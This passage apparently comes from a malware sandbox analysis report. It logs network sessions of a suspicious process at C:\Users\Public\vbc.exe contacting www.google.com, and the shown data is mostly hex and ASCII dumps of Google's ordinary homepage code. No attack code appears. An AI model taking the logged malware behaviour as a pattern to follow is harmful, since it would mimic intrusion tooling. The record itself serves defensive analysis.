                                  2021-09-14 19:48:34 UTC94INData Raw: 64 69 76 3e 3c 2f 64 69 76 3e 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 38 70 74 3b 63 6f 6c 6f 72 3a 23 37 30 37 35 37 61 22 3e 26 63 6f 70 79 3b 20 32 30 32 31 20 2d 20 3c 61 20 68 72 65 66 3d 22 2f 69 6e 74 6c 2f 65 6e 2f 70 6f 6c 69 63 69 65 73 2f 70 72 69 76 61 63 79 2f 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 20 2d 20 3c 61 20 68 72 65 66 3d 22 2f 69 6e 74 6c 2f 65 6e 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 3c 2f 61 3e 3c 2f 70 3e 3c 2f 73 70 61 6e 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 70 6e 76 74 47 35 77 63 70 4e 4f 76 64 39 75 74 54 49 42 58 2f 41 3d 3d 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 63 64 6f 3d 7b 68 65 69 67 68
                                  Data Ascii: div></div><p style="font-size:8pt;color:#70757a">&copy; 2021 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="pnvtG5wcpNOvd9utTIBX/A==">(function(){window.google.cdo={heigh
                                  2021-09-14 19:48:34 UTC95INData Raw: 43 61 73 65 28 29 29 3b 63 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 29 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 67 29 7b 62 3d 6e 75 6c 6c 3b 76 61 72 20 6b 3d 65 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 69 66 28 6b 26 26 6b 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 7b 74 72 79 7b 62 3d 6b 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 67 6f 6f 67 23 68 74 6d 6c 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 66 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 66 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 66 7d 29 7d 63 61 74 63 68 28 70 29 7b 65 2e 63 6f 6e 73 6f 6c 65 26 26 65 2e 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 70 2e 6d 65 73 73 61 67 65 29 7d 67 3d 62 7d 65 6c 73 65 20 67 3d 62 7d 61 3d 28 62 3d 67 29 3f 62 2e 63 72 65 61 74 65 53 63 72
                                  Data Ascii: Case());c=b.createElement(c);if(void 0===g){b=null;var k=e.trustedTypes;if(k&&k.createPolicy){try{b=k.createPolicy("goog#html",{createHTML:f,createScript:f,createScriptURL:f})}catch(p){e.console&&e.console.error(p.message)}g=b}else g=b}a=(b=g)?b.createScr
                                  2021-09-14 19:48:34 UTC96INData Raw: 5c 78 32 32 6a 73 6f 6e 70 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 6d 73 67 73 5c 78 32 32 3a 7b 5c 78 32 32 63 69 62 6c 5c 78 32 32 3a 5c 78 32 32 43 6c 65 61 72 20 53 65 61 72 63 68 5c 78 32 32 2c 5c 78 32 32 64 79 6d 5c 78 32 32 3a 5c 78 32 32 44 69 64 20 79 6f 75 20 6d 65 61 6e 3a 5c 78 32 32 2c 5c 78 32 32 6c 63 6b 79 5c 78 32 32 3a 5c 78 32 32 49 5c 5c 75 30 30 32 36 23 33 39 3b 6d 20 46 65 65 6c 69 6e 67 20 4c 75 63 6b 79 5c 78 32 32 2c 5c 78 32 32 6c 6d 6c 5c 78 32 32 3a 5c 78 32 32 4c 65 61 72 6e 20 6d 6f 72 65 5c 78 32 32 2c 5c 78 32 32 6f 73 6b 74 5c 78 32 32 3a 5c 78 32 32 49 6e 70 75 74 20 74 6f 6f 6c 73 5c 78 32 32 2c 5c 78 32 32 70 73 72 63 5c 78 32 32 3a 5c 78 32 32 54 68 69 73 20 73 65 61 72 63 68 20 77 61 73 20 72 65 6d 6f 76 65 64 20
                                  Data Ascii: \x22jsonp\x22:true,\x22msgs\x22:{\x22cibl\x22:\x22Clear Search\x22,\x22dym\x22:\x22Did you mean:\x22,\x22lcky\x22:\x22I\\u0026#39;m Feeling Lucky\x22,\x22lml\x22:\x22Learn more\x22,\x22oskt\x22:\x22Input tools\x22,\x22psrc\x22:\x22This search was removed
                                  2021-09-14 19:48:34 UTC97INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  2192.168.2.2249170172.217.168.36443C:\Users\Public\vbc.exe
                                  TimestampkBytes transferredDirectionData
                                  2021-09-14 19:48:40 UTC97OUTGET / HTTP/1.1
                                  Host: www.google.com
                                  Connection: Keep-Alive
                                  2021-09-14 19:48:40 UTC97INHTTP/1.1 200 OK
                                  Date: Tue, 14 Sep 2021 19:48:40 GMT
                                  Expires: -1
                                  Cache-Control: private, max-age=0
                                  Content-Type: text/html; charset=ISO-8859-1
                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                  Server: gws
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  Set-Cookie: CONSENT=PENDING+754; expires=Fri, 01-Jan-2038 00:00:00 GMT; path=/; domain=.google.com; Secure
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                  Accept-Ranges: none
                                  Vary: Accept-Encoding
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  2021-09-14 19:48:40 UTC98INData Raw: 35 31 32 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65
                                  Data Ascii: 512b<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-GB"><head><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image
                                  2021-09-14 19:48:40 UTC98INData Raw: 2c 31 30 38 2c 33 34 30 36 2c 36 30 36 2c 32 30 32 33 2c 31 37 37 37 2c 35 32 30 2c 31 34 36 37 30 2c 33 32 32 37 2c 32 38 34 35 2c 37 2c 35 35 39 39 2c 36 37 35 35 2c 35 30 39 36 2c 31 36 33 32 30 2c 39 30 38 2c 32 2c 39 34 31 2c 32 36 31 34 2c 31 33 31 34 32 2c 33 2c 35 37 36 2c 31 30 31 34 2c 31 2c 35 34 34 35 2c 31 34 38 2c 31 31 33 32 33 2c 32 36 35 32 2c 34 2c 31 35 32 38 2c 32 33 30 34 2c 31 32 33 36 2c 35 38 30 33 2c 37 34 2c 31 39 38 33 2c 32 36 32 37 2c 32 30 31 34 2c 31 33 36 31 31 2c 34 37 36 34 2c 32 36 35 38 2c 34 32 34 33 2c 33 31 31 34 2c 33 30 2c 31 33 36 32 38 2c 32 33 30 35 2c 36 33 38 2c 31 34 39 34 2c 35 35 38 36 2c 33 37 37 32 2c 37 34 32 38 2c 36 35 31 2c 31 38 37 30 2c 33 33 30 33 2c 32 35 33 33 2c 39 39 32 2c 33 31 30 32 2c 33 31
                                  Data Ascii: ,108,3406,606,2023,1777,520,14670,3227,2845,7,5599,6755,5096,16320,908,2,941,2614,13142,3,576,1014,1,5445,148,11323,2652,4,1528,2304,1236,5803,74,1983,2627,2014,13611,4764,2658,4243,3114,30,13628,2305,638,1494,5586,3772,7428,651,1870,3303,2533,992,3102,31
                                  2021-09-14 19:48:40 UTC99INData Raw: 72 28 76 61 72 20 62 3b 61 26 26 28 21 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 7c 7c 21 28 62 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 65 69 64 22 29 29 29 3b 29 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 7c 7c 68 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 6e 75 6c 6c 3b 61 26 26 28 21 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 7c 7c 21 28 62 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6c 65 69 64 22 29 29 29 3b 29 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 7d 0a 66 75 6e 63 74 69 6f 6e 20 6e 28 61 2c 62 2c 63 2c 64 2c 67 29 7b 76 61 72 20 65 3d 22 22 3b 63 7c 7c 2d 31 21 3d 3d 62 2e 73 65 61 72 63 68 28 22 26 65 69 3d 22 29 7c 7c 28 65 3d 22 26 65 69 3d
                                  Data Ascii: r(var b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||h}function m(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;return b}function n(a,b,c,d,g){var e="";c||-1!==b.search("&ei=")||(e="&ei=
                                  2021-09-14 19:48:40 UTC101INData Raw: 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 75 62 6d 69 74 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3b 69 66 28 61 3d 62 2e 74 61 72 67 65 74 29 7b 76 61 72 20 63 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 75 62 6d 69 74 66 61 6c 73 65 22 29 3b 61 3d 22 31 22 3d 3d 3d 63 7c 7c 22 71 22 3d 3d 3d 63 26 26 21 61 2e 65 6c 65 6d 65 6e 74 73 2e 71 2e 76 61 6c 75 65 3f 21 30 3a 21 31 7d 65 6c 73 65 20 61 3d 21 31 3b 61 26 26 28 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 62 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 29 7d 2c 21 30 29 3b 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e
                                  Data Ascii: t.documentElement.addEventListener("submit",function(b){var a;if(a=b.target){var c=a.getAttribute("data-submitfalse");a="1"===c||"q"===c&&!a.elements.q.value?!0:!1}else a=!1;a&&(b.preventDefault(),b.stopPropagation())},!0);document.documentElement.addEven
                                  2021-09-14 19:48:40 UTC102INData Raw: 6f 70 61 63 69 74 79 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 30 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 3b 74 6f 70 3a 2d 39 39 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 2d 31 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28
                                  Data Ascii: opacity:0 !important;filter:alpha(opacity=0) !important}.gbm{position:absolute;z-index:999;top:-999px;visibility:hidden;text-align:left;border:1px solid #bebebe;background:#fff;-moz-box-shadow:-1px 1px 1px rgba(0,0,0,.2);-webkit-box-shadow:0 2px 4px rgba(
                                  2021-09-14 19:48:40 UTC103INData Raw: 6c 69 6e 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 2e 67 62 74 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 7a 74 2c 2e 67 62 67 74 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70
                                  Data Ascii: line-box;display:inline-block;line-height:27px;padding:0;vertical-align:top}.gbt{*display:inline}.gbto{box-shadow:0 2px 4px rgba(0,0,0,.2);-moz-box-shadow:0 2px 4px rgba(0,0,0,.2);-webkit-box-shadow:0 2px 4px rgba(0,0,0,.2)}.gbzt,.gbgt{cursor:pointer;disp
                                  2021-09-14 19:48:40 UTC105INData Raw: 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 70 64 6a 73 20 2e 67 62 74 6f 20 2e 67 62 6d 7b 6d 69 6e 2d 77 69 64 74 68 3a 39 39 25 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 64 64 34 62 33 39 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 34 73 2c 23 67 62 69 34 73 31 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 23 67 62 67 36 2e 67 62 67 74 2d 68 76 72 2c 23 67 62 67 36 2e 67 62 67 74 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 7d 2e 67 62 67 34 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d
                                  Data Ascii: coration:none !important}.gbpdjs .gbto .gbm{min-width:99%}.gbz0l .gbtb2{border-top-color:#dd4b39!important}#gbi4s,#gbi4s1{font-weight:bold}#gbg6.gbgt-hvr,#gbg6.gbgt:focus{background-color:transparent;background-image:none}.gbg4a{font-size:0;line-height:0}
                                  2021-09-14 19:48:40 UTC106INData Raw: 67 62 6d 74 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 33 36 63 20 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 74 2c 2e 67 62 6d 74 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 31 30 70 78 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 2a
                                  Data Ascii: gbmt:visited,.gbml1:visited,.gbmlb:visited{color:#36c !important;text-decoration:none !important}.gbmt,.gbmt:visited{display:block}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{display:inline-block;margin:0 10px}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{*
                                  2021-09-14 19:48:40 UTC107INData Raw: 69 6c 64 3a 61 66 74 65 72 2c 23 47 42 4d 50 41 4c 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 27 5c 30 41 5c 30 41 27 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 23 67 62 6d 70 73 7b 2a 7a 6f 6f 6d 3a 31 7d 23 67 62 64 34 20 2e 67 62 70 63 2c 23 67 62 6d 70 61 73 20 2e 67 62 6d 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 37 70 78 7d 23 67 62 64 34 20 2e 67 62 70 67 73 20 2e 67 62 6d 74 63 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 23 67 62 64 34 20 2e 67 62 6d 74 63 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 7d 23 67 62 64 34 20 2e 67 62 70 63 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c
                                  Data Ascii: ild:after,#GBMPAL:last-child:after{content:'\0A\0A';white-space:pre;position:absolute}#gbmps{*zoom:1}#gbd4 .gbpc,#gbmpas .gbmt{line-height:17px}#gbd4 .gbpgs .gbmtc{line-height:27px}#gbd4 .gbmtc{border-bottom:1px solid #bebebe}#gbd4 .gbpc{display:inline-bl
                                  2021-09-14 19:48:40 UTC108INData Raw: 70 61 6c 20 2e 67 62 71 66 62 62 7b 6d 61 72 67 69 6e 3a 30 20 32 30 70 78 7d 2e 67 62 70 30 20 2e 67 62 70 73 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 61 2e 67 62 69 62 61 7b 6d 61 72 67 69 6e 3a 38 70 78 20 32 30 70 78 20 31 30 70 78 7d 2e 67 62 6d 70 69 61 77 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 67 62 78 76 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 67 62 6d 70 69 61 61 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 67 62 6d 70 69 61 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61
                                  Data Ascii: pal .gbqfbb{margin:0 20px}.gbp0 .gbps{*display:inline}a.gbiba{margin:8px 20px 10px}.gbmpiaw{display:inline-block;padding-right:10px;margin-bottom:6px;margin-top:10px}.gbxv{visibility:hidden}.gbmpiaa{display:block;margin-top:10px}.gbmpia{border:none;displa
                                  2021-09-14 19:48:40 UTC110INData Raw: 62 71 66 62 62 2d 68 76 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 2e 67 62 71 66 62 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 2e 67 62 71 66 62 61 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 2e 67 62 71 66 62 62 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 3a 30 7d 2e 67 62 71 66 62 61 2c 2e 67 62 71 66 62 62 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 63 64 63
                                  Data Ascii: bqfbb-hvr{-webkit-box-shadow:0 1px 1px rgba(0,0,0,.1);-moz-box-shadow:0 1px 1px rgba(0,0,0,.1);box-shadow:0 1px 1px rgba(0,0,0,.1)}.gbqfb::-moz-focus-inner,.gbqfba::-moz-focus-inner,.gbqfbb::-moz-focus-inner{border:0}.gbqfba,.gbqfbb{border:1px solid #dcdc
                                  2021-09-14 19:48:40 UTC111INData Raw: 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 33 35 37 61 65 38 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 33 35 37 61 65 38 29 7d 2e 67 62 71 66 62 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 33 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 33 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70
                                  Data Ascii: r-gradient(top,#4d90fe,#357ae8);background-image:linear-gradient(top,#4d90fe,#357ae8)}.gbqfb:active{background-color:inherit;-webkit-box-shadow:inset 0 1px 2px rgba(0, 0, 0, 0.3);-moz-box-shadow:inset 0 1px 2px rgba(0, 0, 0, 0.3);box-shadow:inset 0 1px 2p
                                  2021-09-14 19:48:40 UTC112INData Raw: 72 3d 27 23 66 31 66 31 66 31 27 29 7d 2e 67 62 71 66 62 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 74 6f 70 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 66 72 6f 6d 28 23 66 66 66 29 2c 74 6f 28 23 66 62 66 62 66 62 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 66 66 2c 23 66 62 66 62 66 62 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 66 66 2c 23 66 62 66 62 66 62 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d
                                  Data Ascii: r='#f1f1f1')}.gbqfbb{background-color:#fff;background-image:-webkit-gradient(linear,left top,left bottom,from(#fff),to(#fbfbfb));background-image:-webkit-linear-gradient(top,#fff,#fbfbfb);background-image:-moz-linear-gradient(top,#fff,#fbfbfb);background-
                                  2021-09-14 19:48:40 UTC113INData Raw: 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 0a 23 67 62 6d 70 61 73 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 32 30 70 78 7d 23 67 62 6d 6d 7b 6d 61 78 2d 68 65 69 67 68 74 3a 35 33 30 70 78 7d 2e 67 62 73 62 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 2a 7a 6f 6f 6d 3a 31 7d 2e 67 62 73 62 69 63 7b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 2e 67 62 73 62
                                  Data Ascii: gba(0,0,0,.1);-moz-box-shadow:inset 0 1px 2px rgba(0,0,0,.1);box-shadow:inset 0 1px 2px rgba(0,0,0,.1)}#gbmpas{max-height:220px}#gbmm{max-height:530px}.gbsb{-webkit-box-sizing:border-box;display:block;position:relative;*zoom:1}.gbsbic{overflow:auto}.gbsb
                                  2021-09-14 19:48:40 UTC115INData Raw: 29 29 2c 63 6f 6c 6f 72 2d 73 74 6f 70 28 31 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 6c 65 66 74 20 74 6f 70 2c 66 72 6f 6d 28 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 29 2c 74 6f 28 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62
                                  Data Ascii: )),color-stop(1,rgba(0,0,0,.1)));background:-webkit-gradient(linear,left bottom,left top,from(rgba(0,0,0,.2)),to(rgba(0,0,0,0)));background-image:-webkit-linear-gradient(bottom,rgba(0,0,0,.2),rgba(0,0,0,0));background-image:-moz-linear-gradient(bottom,rgb
